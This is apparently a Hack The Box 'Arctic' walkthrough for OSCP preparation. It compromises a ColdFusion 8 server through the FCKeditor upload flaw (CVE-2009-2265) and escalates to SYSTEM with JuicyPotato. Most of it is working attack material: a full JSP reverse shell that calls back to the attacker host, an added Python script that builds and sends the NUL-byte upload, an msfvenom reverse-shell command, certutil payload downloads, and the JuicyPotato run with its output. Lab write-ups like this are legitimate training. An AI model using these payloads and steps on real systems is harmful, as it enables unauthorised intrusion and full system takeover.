In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Nmap scan
# Nmap 7.94 scan initiated Fri Oct 20 06:22:37 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/arctic/results/10.10.10.11/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/arctic/results/10.10.10.11/scans/xml/_quick_tcp_nmap.xml 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-20 06:22:44 EDT for 520s
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
8500/tcp open fmtp? syn-ack
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 20 06:31:24 2023 -- 1 IP address (1 host up) scanned in 527.29 seconds
Only one port answers. Port 8500 is the default for ColdFusion's built-in JRun web server, which is why nmap could not fingerprint the service and fell back to the port-table guess "fmtp?". Browsing to http://10.10.10.11:8500/CFIDE/administrator/ shows the ColdFusion Administrator login page, with ColdFusion 8 in the banner.
Checking searchsploit for ColdFusion:
Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities | cfm/webapps/36172.txt
Adobe ColdFusion 8 - Remote Command Execution (RCE) | cfm/webapps/50057.py
Adobe ColdFusion 9 - Administrative Authentication Bypass | windows/webapps/27755.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit) | multiple/remote/30210.rb
I downloaded 50057.py (searchsploit -m 50057), opened it in nano and modified only the block with the connection details (LHOST/LPORT for the reverse shell, RHOST/RPORT for the target):
if __name__ == '__main__':
    # Define some information
    lhost = '10.10.14.2'    # our Kali tun0 address, where the JSP shell connects back
    lport = 4444            # port our nc listener uses
    rhost = "10.10.10.11"   # Arctic
    rport = 8500            # ColdFusion 8 on its JRun port
    filename = uuid.uuid4().hex   # random name for the uploaded JSP
I ran the exploit and, somewhat surprisingly, it worked straight away. It needs no credentials: it uploads a JSP reverse shell through the FCKeditor upload connector that ships with ColdFusion 8 (CVE-2009-2265), then requests the uploaded file so JRun executes it.
╭─kali@kali ~/HTB/arctic
╰─$ python 50057.py 10.10.10.11
Generating a payload...
Payload size: 1496 bytes
Saved as: 5992dec755364fc987488dd24ddeb4b9.jsp
Priting request...
Content-type: multipart/form-data; boundary=1c024a8201ae46f7ac72e9adbd419593
Content-length: 1697
--1c024a8201ae46f7ac72e9adbd419593
Content-Disposition: form-data; name="newfile"; filename="5992dec755364fc987488dd24ddeb4b9.txt"
Content-Type: text/plain
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
    InputStream g8;
    OutputStream gX;

    StreamConnector( InputStream g8, OutputStream gX )
    {
        this.g8 = g8;
        this.gX = gX;
    }

    public void run()
    {
        BufferedReader rC = null;
        BufferedWriter ykg = null;
        try
        {
            rC = new BufferedReader( new InputStreamReader( this.g8 ) );
            ykg = new BufferedWriter( new OutputStreamWriter( this.gX ) );
            char buffer[] = new char[8192];
            int length;
            while( ( length = rC.read( buffer, 0, buffer.length ) ) > 0 )
            {
                ykg.write( buffer, 0, length );
                ykg.flush();
            }
        } catch( Exception e ){}
        try
        {
            if( rC != null )
                rC.close();
            if( ykg != null )
                ykg.close();
        } catch( Exception e ){}
    }
}

try
{
    String ShellPath;
    if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
        ShellPath = new String("/bin/sh");
    } else {
        ShellPath = new String("cmd.exe");
    }
    Socket socket = new Socket( "10.10.14.2", 4444 );
    Process process = Runtime.getRuntime().exec( ShellPath );
    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
--1c024a8201ae46f7ac72e9adbd419593--
Sending request and printing response...
<script type="text/javascript">
window.parent.OnUploadCompleted( 0, "/userfiles/file/5992dec755364fc987488dd24ddeb4b9.jsp/5992dec755364fc987488dd24ddeb4b9.txt", "5992dec755364fc987488dd24ddeb4b9.txt", "0" );
</script>
Printing some information for debugging...
lhost: 10.10.14.2
lport: 4444
rhost: 10.10.10.11
rport: 8500
payload: 5992dec755364fc987488dd24ddeb4b9.jsp
Deleting the payload...
Listening for connection...
Executing the payload...
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49592
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>
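The upload reply above tells the whole story: the server wrote the file to /userfiles/file/<name>.jsp/<name>.txt, i.e. a .txt file inside a directory whose name ends in .jsp. To make the mechanism visible without touching a target, here is an added example (my own code, not part of the write-up and not taken from 50057.py) that builds the same kind of multipart request and parses the FCKeditor callback to recover the path to fetch. The connector path is reproduced from memory of the 50057.py script and should be checked against your copy; the sample reply is constructed from the output shown above.

```python
"""
Added example, not part of the original write-up or of 50057.py: reproduce the
request that exploit builds and parse the reply it gets back, so the mechanism
is visible without running anything against a target.
"""
import http.client
import re
import uuid

# FCKeditor connector shipped with ColdFusion 8 that 50057.py posts to.
# Reproduced from memory of that script: check it against your copy of 50057.py.
CONNECTOR = "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm"

# Constructed sample: the reply shown in the write-up, trimmed to the callback.
SAMPLE_RESPONSE = (
    '<script type="text/javascript">\n'
    'window.parent.OnUploadCompleted( 0, "/userfiles/file/5992dec755364fc987488dd24ddeb4b9.jsp'
    '/5992dec755364fc987488dd24ddeb4b9.txt", "5992dec755364fc987488dd24ddeb4b9.txt", "0" );\n'
    '</script>'
)


def upload_url(name):
    """Query string for the upload. CurrentFolder names a directory ending in
    '.jsp' followed by a NUL byte: the .txt filename satisfies the upload's
    extension check, but the file is written below '<name>.jsp/'."""
    return f"{CONNECTOR}?Command=FileUpload&Type=File&CurrentFolder=/{name}.jsp%00"


def build_multipart(name, jsp_source, boundary=None):
    """Multipart body with the JSP disguised as a .txt upload, same layout as the
    request printed by 50057.py."""
    boundary = boundary or uuid.uuid4().hex
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="newfile"; filename="{name}.txt"\r\n'
        "Content-Type: text/plain\r\n"
        "\r\n"
        f"{jsp_source}\r\n"
        f"--{boundary}--\r\n"
    )
    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body.encode())),
    }
    return headers, body


_CALLBACK = re.compile(r'OnUploadCompleted\(\s*(\d+)\s*,\s*"([^"]*)"')


def parse_upload_response(html):
    """Return (error_code, server_path) from FCKeditor's JavaScript callback,
    or None if the reply does not contain it. Error code 0 means success."""
    m = _CALLBACK.search(html)
    return (int(m.group(1)), m.group(2)) if m else None


def jsp_url(rhost, rport, server_path):
    """URL the exploit requests to fire the payload. JRun's *.jsp servlet
    mapping matches the '<name>.jsp' path segment and treats the trailing
    '/<name>.txt' as path info, so the .txt content is compiled as a JSP."""
    return f"http://{rhost}:{rport}{server_path}"


def send_upload(rhost, rport, name, jsp_source, timeout=30):
    """Perform the upload (network call; not exercised in the dry run)."""
    headers, body = build_multipart(name, jsp_source)
    conn = http.client.HTTPConnection(rhost, rport, timeout=timeout)
    conn.request("POST", upload_url(name), body=body.encode(), headers=headers)
    reply = conn.getresponse().read().decode(errors="replace")
    conn.close()
    return parse_upload_response(reply)


if __name__ == "__main__":
    # Dry run on the constructed sample, with a harmless JSP instead of a shell.
    name = uuid.uuid4().hex
    headers, body = build_multipart(name, '<% out.println("uploaded"); %>')
    print("POST", upload_url(name))
    print(headers["Content-Type"], headers["Content-Length"])
    code, path = parse_upload_response(SAMPLE_RESPONSE)
    print("server wrote", path, "error", code)
    print("fetch", jsp_url("10.10.10.11", 8500, path))
```

The two pieces that matter are the NUL byte after `.jsp` in CurrentFolder (the extension check sees a .txt upload, the filesystem gets a `.jsp` directory) and JRun's path-info handling on the fetch, which is why the exploit only has to GET the path the callback hands back.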
Next, systeminfo (note the Greek locale, which garbles some date output, and above all "Hotfix(s): N/A": an unpatched Server 2008 R2 build 7600):
C:\ColdFusion8\runtime\bin>systeminfo
systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45
System Boot Time: 21/10/2023, 9:20:12
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 6.143 MB
Available Physical Memory: 4.838 MB
Virtual Memory: Max Size: 12.285 MB
Virtual Memory: Available: 10.982 MB
Virtual Memory: In Use: 1.303 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.11
C:\ColdFusion8\runtime\bin>
And whoami /all. The shell runs as the local user arctic\tolis, in the NT AUTHORITY\SERVICE group (so the ColdFusion process is a service), and SeImpersonatePrivilege is enabled, which is the precondition for the Potato family of privilege escalations:
C:\ColdFusion8\runtime\bin>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
============ =============================================
arctic\tolis S-1-5-21-2913191377-1678605233-910955532-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\ColdFusion8\runtime\bin>
Privilege escalation
We save the systeminfo output to sys.txt and feed it to Windows-Exploit-Suggester. The script is Python 2 code, so running it under the default Python 3 fails on the old except syntax; python2.7 works:
╰─$ ./windows-exploit-suggester.py --database 2023-10-18-mssb.xls --systeminfo sys.txt
File "/home/kali/HTB/arctic/Windows-Exploit-Suggester/./windows-exploit-suggester.py", line 390
except IOError, e:
^^^^^^^^^^
SyntaxError: multiple exception types must be parenthesized
╭─kali@kali ~/HTB/arctic/Windows-Exploit-Suggester ‹master●›
╰─$ python2.7 ./windows-exploit-suggester.py --database 2023-10-18-mssb.xls --systeminfo sys.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
╭─kali@kali ~/HTB/arctic/Windows-Exploit-Suggester ‹master●›
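Windows-Exploit-Suggester confirms the "0 hotfixes" picture and lists kernel candidates (MS10-059 among them), but the faster route is the one whoami /priv already pointed at. As an added example (my own code, not from the write-up, from JuicyPotato or from windows-exploit-suggester), the following Python script parses the systeminfo and whoami /priv output already collected and applies the two checks JuicyPotato actually depends on: SeImpersonatePrivilege enabled, and a Windows build older than 17763 (Windows 10 1809 / Server 2019, where the DCOM changes broke the technique). The embedded input is constructed from excerpts of the output above.

```python
"""
Added example, not from the write-up or from windows-exploit-suggester: decide
the privilege-escalation route from the systeminfo and whoami /priv output
already collected, using the conditions JuicyPotato actually depends on.
"""
import re

# Constructed samples: excerpts of the systeminfo and whoami /all output above.
SYSTEMINFO = """\
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
"""

WHOAMI_PRIV = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Windows 10 1809 / Server 2019. From this build on, the DCOM/OXID resolver
# changes break JuicyPotato's trick of pointing a COM server at a local port.
JUICY_MAX_BUILD = 17763


def parse_systeminfo(text):
    """'Key:   value' lines into a dict; only the first colon splits."""
    info = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            info[key.strip()] = value.strip()
    return info


def parse_privileges(text):
    """Map SeXxxPrivilege -> True/False from the whoami /priv table."""
    privs = {}
    for line in text.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.*\s(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2) == "Enabled"
    return privs


def os_build(info):
    """(major, minor, build) from 'OS Version: 6.1.7600 N/A Build 7600'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", info.get("OS Version", ""))
    return tuple(int(x) for x in m.groups()) if m else None


def hotfix_count(info):
    """'N/A' means none; otherwise the line starts with the count."""
    value = info.get("Hotfix(s)", "")
    m = re.match(r"(\d+)", value)
    return int(m.group(1)) if m else 0


def triage(systeminfo_text, whoami_text):
    """Return a list of findings describing which escalation routes apply."""
    info = parse_systeminfo(systeminfo_text)
    privs = parse_privileges(whoami_text)
    build = os_build(info)
    findings = []

    if privs.get("SeImpersonatePrivilege"):
        if build and build[2] < JUICY_MAX_BUILD:
            findings.append(f"juicy-potato: SeImpersonatePrivilege enabled, build {build[2]}")
        else:
            findings.append("impersonate-only: build too new for JuicyPotato, try PrintSpoofer/RoguePotato")

    if hotfix_count(info) == 0:
        findings.append("no-hotfixes: feed systeminfo to windows-exploit-suggester, kernel exploits are in play")

    # systeminfo's "System Type" decides which msfvenom payload to build.
    arch = "x64" if "x64" in info.get("System Type", "") else "x86"
    findings.append(f"payload-arch: {arch}")
    return findings


if __name__ == "__main__":
    for line in triage(SYSTEMINFO, WHOAMI_PRIV):
        print(line)
```

On Arctic this reports the JuicyPotato route, the absence of hotfixes and an x64 payload, which is exactly the path the rest of this write-up takes; on a 2019 or newer host the same privilege would instead send you to a newer Potato variant.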
Juicy Potato
We copy JuicyPotato.exe from our collection of Windows binaries into the arctic working folder:
inPEASx86.exe
dnSpy.Console.exe JuicyPotato.exe nc64.exe Potato.exe
╭─kali@kali ~/exe
╰─$ cd ~/HTB/arctic
╭─kali@kali ~/HTB/arctic
╰─$ ls
50057.py JuicyPotato.exe log1.dat results Windows-Exploit-Suggester
╭─kali@kali ~/HTB/arctic
We generate an x64 reverse shell with msfvenom (systeminfo reported an x64-based PC), calling back to port 443:
╭─kali@kali ~/HTB/arctic
╰─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 EXITFUNC=thread -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
╭─kali@kali ~/HTB/arctic
╰─$
We serve both files over HTTP from Kali on port 90 and fetch them on the target with certutil:
C:\ColdFusion8\runtime\bin>certutil -urlcache -f http://10.10.14.2:90/shell.exe C:\Users\Public\Downloads\shell.ex
certutil -urlcache -f http://10.10.14.2:90/shell.exe C:\Users\Public\Downloads\shell.ex
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\ColdFusion8\runtime\bin>certutil -urlcache -f http://10.10.14.2:90/JuicyPotato.exe C:\Users\Public\Downloads\JuicyPotato.ex
certutil -urlcache -f http://10.10.14.2:90/JuicyPotato.exe C:\Users\Public\Downloads\JuicyPotato.ex
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\ColdFusion8\runtime\bin>
We run JuicyPotato: -p is the payload to launch as SYSTEM, -l the local port its COM listener binds, and -t * tells it to try both CreateProcessWithTokenW and CreateProcessAsUser:
JuicyPotato.exe -l 80 -p C:\Users\Public\Downloads\shell.exe -t *
That first attempt gave no shell back, so we create C:\temp, download a fresh copy of the payload (shell3.exe) and JuicyPotato there, and retry with the listener on 443:
C:\>mkdir temp
mkdir temp
C:\>cd temp
cd temp
C:\temp>certutil -urlcache -f http://10.10.14.2:90/shell3.exe C:\temp\shell3.exe
certutil -urlcache -f http://10.10.14.2:90/shell3.exe C:\temp\shell3.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\temp>certutil -urlcache -f http://10.10.14.2:90/JuicyPotato.exe C:\temp\JuicyPotato.exe
certutil -urlcache -f http://10.10.14.2:90/JuicyPotato.exe C:\temp\JuicyPotato.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5C03-76A8
Directory of C:\temp
22/10/2023 12:06 <DIR> .
22/10/2023 12:06 <DIR> ..
22/10/2023 12:06 347.648 JuicyPotato.exe
22/10/2023 12:05 7.168 shell3.exe
2 File(s) 354.816 bytes
2 Dir(s) 1.431.105.536 bytes free
C:\temp>JuicyPotato.exe -t * -p C:\temp\shell3.exe -l 443
JuicyPotato.exe -t * -p C:\temp\shell3.exe -l 443
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 443
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
C:\temp>
╭─kali@kali ~/scripts
╰─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49865
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>